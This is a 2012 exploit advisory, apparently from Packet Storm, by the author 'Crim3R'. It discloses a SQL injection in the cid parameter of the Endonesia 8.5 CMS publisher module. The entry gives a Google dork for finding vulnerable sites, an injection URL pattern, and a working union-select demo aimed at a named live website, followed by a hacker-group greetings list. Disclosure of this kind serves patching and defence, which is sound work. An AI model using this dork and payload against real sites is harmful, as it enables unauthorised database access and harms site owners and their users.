Endonesia 8.5 CMS Publisher Module SQL Injection

2012-08-29T00:00:00
ID PACKETSTORM:116032
Type packetstorm
Reporter Crim3R
Modified 2012-08-29T00:00:00

Description

                                        
                                            `#######################################################  
# #  
# ________ .__ __________________ #  
# \_ ___ \_______|__| _____ \_____ \______ \ #  
# / \ \/\_ __ \ |/ \ _(__ <| _/ #  
# \ \____| | \/ | Y Y \/ \ | \ #  
# \______ /|__| |__|__|_| /______ /____|_ / #  
# \/ \/ \/ \/ #   
# #  
#######################################################  
#  
#  
# Exploit Title: Endonesia 8.5 CMS Publiher Module Sql Injection Vulnerability  
#  
# Google Dork: Intext:"Powered by Endonesia 8.5"  
#  
# Date: 08/29/2012  
#  
# Author: Crim3R  
#  
# Site : Http://Ajaxtm.com/  
#  
# download Link : http://nchc.dl.sourceforge.net/project/endonesia/eNdonesia/eNdonesia.8.5/endonesia.8.5.zip  
#  
# Tested on: all  
#  
==================================  
cid parametr in Publiher Module in mod/publisher/publisher.php is Vulnerable to sql injection  
  
exploit :   
mod.php?mod=publisher&op=viewcat&cid=-[id][sql injection]  
  
D3M0 :   
  
http://www.duamata.com/mod.php?mod=publisher&op=viewcat&cid=-3+union+select+@@version,2--  
  
===============Crim3R@Att.Net=========  
  
[+] Greetz to All Ajaxtm Security Member  
  
Cair3x - HUrr!c4nE - black.shadowes - hadihadi - iM4n - irsdl - the-0utl4w - Expl0its - Mormoroth - Mikili - Black.Spook -  
S3Ri0uS - Zalatan - Net.Edit0r - Ciph3r - A.u.r.A  
`